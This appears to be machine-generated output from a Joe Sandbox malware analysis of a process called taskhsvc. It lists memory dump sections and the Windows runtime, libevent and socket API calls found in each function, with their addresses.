    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00334024
      • Part of subcall function 0031663E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001DBB06), ref: 0031666A
    • abort.MSVCRT ref: 0033407F
    • abort.MSVCRT ref: 003340C1
    • abort.MSVCRT ref: 0033411F
      • Part of subcall function 00333BFD: abort.MSVCRT ref: 00333C50
      • Part of subcall function 00333BFD: abort.MSVCRT ref: 00333CED
      • Part of subcall function 00333BFD: abort.MSVCRT ref: 00333D40
      • Part of subcall function 00333BFD: __stack_chk_fail.LIBSSP-0 ref: 00333D71
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 003341E9
      • Part of subcall function 00333BC0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00333D00), ref: 00333BF6
    • __stack_chk_fail.LIBSSP-0 ref: 0033422C
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • strcmp.MSVCRT ref: 00229E0E
    • free.MSVCRT ref: 00229E9F
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00229E60
      • Part of subcall function 003278F5: abort.MSVCRT ref: 00327945
      • Part of subcall function 003278F5: __stack_chk_fail.LIBSSP-0 ref: 00327960
      • Part of subcall function 00317D3D: free.MSVCRT ref: 00317D98
      • Part of subcall function 00317D3D: __stack_chk_fail.LIBSSP-0 ref: 00317DAB
    • strcmp.MSVCRT ref: 00229ED1
    • __stack_chk_fail.LIBSSP-0 ref: 00229F66
      • Part of subcall function 00229AAB: __stack_chk_fail.LIBSSP-0 ref: 00229B28
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • fwrite.MSVCRT ref: 003F6A3B
    • vfprintf.MSVCRT ref: 003F6A57
    • abort.MSVCRT ref: 003F6A5C
      • Part of subcall function 003F6A70: VirtualQuery.KERNEL32 ref: 003F6B00
      • Part of subcall function 003F6A70: VirtualProtect.KERNELBASE ref: 003F6B42
      • Part of subcall function 003F6A70: GetLastError.KERNEL32 ref: 003F6B64
    • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003F6D3B
    • VirtualProtect.KERNELBASE ref: 003F6D6C
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855588250.003F6000.00000080.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002AC627: event_new.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C625F), ref: 002AC691
      • Part of subcall function 002AC627: event_add.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C625F), ref: 002AC6AB
      • Part of subcall function 002AC627: __stack_chk_fail.LIBSSP-0 ref: 002AC722
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 0025B282: __stack_chk_fail.LIBSSP-0 ref: 0025B2C4
    • abort.MSVCRT ref: 001C6309
    • abort.MSVCRT ref: 001C63D7
      • Part of subcall function 001C65EF: __stack_chk_fail.LIBSSP-0 ref: 001C6622
    • __stack_chk_fail.LIBSSP-0 ref: 001C63EC
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
      • Part of subcall function 003EC3EA: abort.MSVCRT ref: 003EC44C
      • Part of subcall function 003EC3EA: abort.MSVCRT ref: 003EC48B
      • Part of subcall function 003EC3EA: abort.MSVCRT ref: 003EC4CA
      • Part of subcall function 003EC3EA: event_new.LIBEVENT-2-0-5 ref: 003EC503
      • Part of subcall function 003EC3EA: free.MSVCRT ref: 003EC52C
      • Part of subcall function 003EC3EA: event_add.LIBEVENT-2-0-5 ref: 003EC560
      • Part of subcall function 003EC3EA: __stack_chk_fail.LIBSSP-0 ref: 003EC573
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00333C50
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • abort.MSVCRT ref: 00333CED
      • Part of subcall function 00333BC0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00333D00), ref: 00333BF6
    • __stack_chk_fail.LIBSSP-0 ref: 00333D71
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00333D40
      • Part of subcall function 003166E7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00216C35), ref: 00316717
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • SetProcessDEPPolicy.KERNEL32 ref: 001CA762
      • Part of subcall function 0021FAAB: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA76C), ref: 0021FB18
      • Part of subcall function 0032B518: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001CA774), ref: 0032B547
      • Part of subcall function 0032B518: __stack_chk_fail.LIBSSP-0 ref: 0032B59D
    • time.MSVCRT ref: 001CA77B
      • Part of subcall function 0032545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA788), ref: 00325486
      • Part of subcall function 003328F6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001CA78D), ref: 00332917
      • Part of subcall function 00313FB1: strchr.MSVCRT ref: 00313FF5
      • Part of subcall function 00313FB1: __stack_chk_fail.LIBSSP-0 ref: 00314053
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • __stack_chk_fail.LIBSSP-0 ref: 001CA93D
      • Part of subcall function 003308B7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,001CA819), ref: 00330901
    • evutil_secure_rng_set_urandom_device_file.LIBEVENT-2-0-5 ref: 001CA852
      • Part of subcall function 0033051A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003307D7), ref: 00330566
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • SHGetSpecialFolderLocation.SHELL32 ref: 00229964
    • _getcwd.MSVCRT ref: 0022997C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • SHGetPathFromIDListA.SHELL32 ref: 002299D9
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
      • Part of subcall function 00315911: strlen.MSVCRT ref: 0031596F
      • Part of subcall function 00315911: __stack_chk_fail.LIBSSP-0 ref: 003159B7
    • __stack_chk_fail.LIBSSP-0 ref: 00229AA1
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 001C4469
      • Part of subcall function 00287767: abort.MSVCRT ref: 002877D7
      • Part of subcall function 00287767: event_new.LIBEVENT-2-0-5 ref: 00287805
      • Part of subcall function 00287767: abort.MSVCRT ref: 00287850
      • Part of subcall function 00287767: __stack_chk_fail.LIBSSP-0 ref: 00287861
      • Part of subcall function 001C433D: strcmp.MSVCRT ref: 001C4373
      • Part of subcall function 001C433D: __stack_chk_fail.LIBSSP-0 ref: 001C43AE
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
    • event_base_once.LIBEVENT-2-0-5 ref: 001C452C
    • __stack_chk_fail.LIBSSP-0 ref: 001C453D
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 0031ADAF
    • abort.MSVCRT ref: 0031ADEE
    • __stack_chk_fail.LIBSSP-0 ref: 0031AFED
      • Part of subcall function 00319A20: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,0031AE1A), ref: 00319A74
    • strchr.MSVCRT ref: 0031AE3D
    • strstr.MSVCRT ref: 0031AE5A
    • strchr.MSVCRT ref: 0031AE76
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 0031AEE4
    • strlen.MSVCRT ref: 0031AF08
      • Part of subcall function 003214A4: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 003214FA
      • Part of subcall function 003214A4: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 0032153C
      • Part of subcall function 003214A4: strncpy.MSVCRT ref: 00321566
      • Part of subcall function 003214A4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00335D24), ref: 00321584
      • Part of subcall function 00322124: strchr.MSVCRT ref: 0032215B
      • Part of subcall function 00322124: __stack_chk_fail.LIBSSP-0 ref: 0032219D
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 002DF514
    • strlen.MSVCRT ref: 002DF53D
    • memchr.MSVCRT ref: 002DF571
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DE529
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DE5BE
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DE5EE
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DECD7
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DED07
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DEDAC
      • Part of subcall function 002DE4A0: abort.MSVCRT ref: 002DEFAD
      • Part of subcall function 002DE4A0: memchr.MSVCRT ref: 002DEFD7
      • Part of subcall function 002DE4A0: strcmp.MSVCRT ref: 002DF193
      • Part of subcall function 002DE4A0: strcmp.MSVCRT ref: 002DF262
      • Part of subcall function 002DE4A0: __stack_chk_fail.LIBSSP-0 ref: 002DF466
      • Part of subcall function 002DDDB7: __stack_chk_fail.LIBSSP-0 ref: 002DDDF1
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00322710: abort.MSVCRT ref: 00322766
      • Part of subcall function 00322710: abort.MSVCRT ref: 003227B5
      • Part of subcall function 00322710: __stack_chk_fail.LIBSSP-0 ref: 0032281B
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 002DFC98
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E5A9A: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5BF8), ref: 001E5B33
      • Part of subcall function 001E5A9A: __stack_chk_fail.LIBSSP-0 ref: 001E5B88
    • __stack_chk_fail.LIBSSP-0 ref: 001E5FE0
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001E3214: strlen.MSVCRT ref: 001E323C
      • Part of subcall function 001E3214: __stack_chk_fail.LIBSSP-0 ref: 001E3269
    • atoi.MSVCRT ref: 001E5DE7
    • abort.MSVCRT ref: 001E5F86
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 001E52AC: abort.MSVCRT ref: 001E533A
      • Part of subcall function 001E52AC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C33C1), ref: 001E5350
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E390F
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E398A
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E3A1C
      • Part of subcall function 001E3826: memcpy.MSVCRT ref: 001E3A4E
      • Part of subcall function 001E3826: memcpy.MSVCRT ref: 001E3AB6
      • Part of subcall function 001E3826: abort.MSVCRT ref: 001E3B2D
      • Part of subcall function 001E3826: __stack_chk_fail.LIBSSP-0 ref: 001E3B52
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • time.MSVCRT ref: 001C56F9
      • Part of subcall function 0032545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA788), ref: 00325486
      • Part of subcall function 00206B33: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,001C57A7), ref: 00206C08
      • Part of subcall function 00205E05: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C57AC), ref: 00205F31
      • Part of subcall function 0020617A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,001C57B1), ref: 00206215
      • Part of subcall function 00205F3D: __stack_chk_fail.LIBSSP-0 ref: 0020604B
      • Part of subcall function 0020692E: free.MSVCRT ref: 00206A1C
      • Part of subcall function 0020692E: free.MSVCRT ref: 00206A56
      • Part of subcall function 0020692E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,001C57BB), ref: 00206A72
      • Part of subcall function 0025B356: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002241AB), ref: 0025B3B6
    • __stack_chk_fail.LIBSSP-0 ref: 001C59FE
      • Part of subcall function 0025B0C8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0025A37E,?,?,?,?,?,?,?,?,?,0025A412), ref: 0025B107
      • Part of subcall function 001C18D5: __stack_chk_fail.LIBSSP-0 ref: 001C18F5
    • free.MSVCRT ref: 001C59A4
      • Part of subcall function 0025A3A0: __stack_chk_fail.LIBSSP-0 ref: 0025A3EA
    • free.MSVCRT ref: 001C58EB
      • Part of subcall function 0025A3F1: __stack_chk_fail.LIBSSP-0 ref: 0025A45C
      • Part of subcall function 0032FA37: __stack_chk_fail.LIBSSP-0 ref: 0032FA98
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00208197: __stack_chk_fail.LIBSSP-0 ref: 00208216
      • Part of subcall function 002C5384: __stack_chk_fail.LIBSSP-0 ref: 002C5456
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • free.MSVCRT ref: 0022A1E7
      • Part of subcall function 00229D8C: strcmp.MSVCRT ref: 00229E0E
      • Part of subcall function 00229D8C: free.MSVCRT ref: 00229E60
      • Part of subcall function 00229D8C: free.MSVCRT ref: 00229E9F
      • Part of subcall function 00229D8C: strcmp.MSVCRT ref: 00229ED1
      • Part of subcall function 00229D8C: __stack_chk_fail.LIBSSP-0 ref: 00229F66
    • free.MSVCRT ref: 0022A03C
    • __stack_chk_fail.LIBSSP-0 ref: 0022A20C
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
      • Part of subcall function 00326B1B: abort.MSVCRT ref: 00326B85
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326BFE
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326C73
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326CDE
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326D57
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326D9F
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326DB1
      • Part of subcall function 00326B1B: strchr.MSVCRT ref: 00326DED
      • Part of subcall function 00326B1B: strlen.MSVCRT ref: 00326E4C
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326EEB
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326EFD
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326F1D
      • Part of subcall function 00326B1B: memcpy.MSVCRT ref: 00326F3D
      • Part of subcall function 00326B1B: __stack_chk_fail.LIBSSP-0 ref: 00326F50
    • free.MSVCRT ref: 0022A14F
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00325A21
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 003257BB: strlen.MSVCRT ref: 003257D7
      • Part of subcall function 003257BB: __stack_chk_fail.LIBSSP-0 ref: 00325841
    • _stati64.MSVCRT ref: 00325A8E
    • free.MSVCRT ref: 00325AA7
    • strerror.MSVCRT ref: 00325AD7
    • _mkdir.MSVCRT ref: 00325B54
    • strerror.MSVCRT ref: 00325B72
    • __stack_chk_fail.LIBSSP-0 ref: 00325C45
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E331A: __stack_chk_fail.LIBSSP-0 ref: 001E335F
      • Part of subcall function 001E32E4: __stack_chk_fail.LIBSSP-0 ref: 001E3313
    • recv.WS2_32 ref: 001E42C1
    • abort.MSVCRT ref: 001E4431
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 001E4444
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 002BF99F
      • Part of subcall function 00324AEC: strftime.MSVCRT ref: 00324B34
      • Part of subcall function 00324AEC: __stack_chk_fail.LIBSSP-0 ref: 00324B45
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • strlen.MSVCRT ref: 002BF845
    • strerror.MSVCRT ref: 002BF878
    • strlen.MSVCRT ref: 002BF8B5
      • Part of subcall function 00316B7E: _lseek.MSVCRT ref: 00316BAF
      • Part of subcall function 00316B7E: __stack_chk_fail.LIBSSP-0 ref: 00316BBD
      • Part of subcall function 003255C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
      • Part of subcall function 003255C5: _write.MSVCRT ref: 00325691
      • Part of subcall function 003255C5: __stack_chk_fail.LIBSSP-0 ref: 003256C2
    • strerror.MSVCRT ref: 002BF93C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 003159C4: _open.MSVCRT ref: 00315A44
      • Part of subcall function 003159C4: __stack_chk_fail.LIBSSP-0 ref: 00315A5A
    • strerror.MSVCRT ref: 003168C0
    • _lseek.MSVCRT ref: 00316919
    • strerror.MSVCRT ref: 00316972
    • _close.MSVCRT ref: 003169B7
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    • __stack_chk_fail.LIBSSP-0 ref: 003169FB
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 001DE10A
      • Part of subcall function 001DCFEC: abort.MSVCRT ref: 001DD04F
      • Part of subcall function 001DCFEC: __stack_chk_fail.LIBSSP-0 ref: 001DD062
      • Part of subcall function 001DC6B8: __stack_chk_fail.LIBSSP-0 ref: 001DC6EB
    • abort.MSVCRT ref: 001DE17C
    • abort.MSVCRT ref: 001DE1BB
    • __stack_chk_fail.LIBSSP-0 ref: 001DE24C
      • Part of subcall function 001DC72F: __stack_chk_fail.LIBSSP-0 ref: 001DC77E
      • Part of subcall function 001DB024: __stack_chk_fail.LIBSSP-0 ref: 001DB059
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • send.WS2_32 ref: 001E48F4
    • abort.MSVCRT ref: 001E49F5
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001E3B5E: abort.MSVCRT ref: 001E3BBD
      • Part of subcall function 001E3B5E: abort.MSVCRT ref: 001E3C00
      • Part of subcall function 001E3B5E: __stack_chk_fail.LIBSSP-0 ref: 001E3CB8
    • __stack_chk_fail.LIBSSP-0 ref: 001E4A08
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • time.MSVCRT ref: 002875F0
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • abort.MSVCRT ref: 00287690
    • __stack_chk_fail.LIBSSP-0 ref: 00287724
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
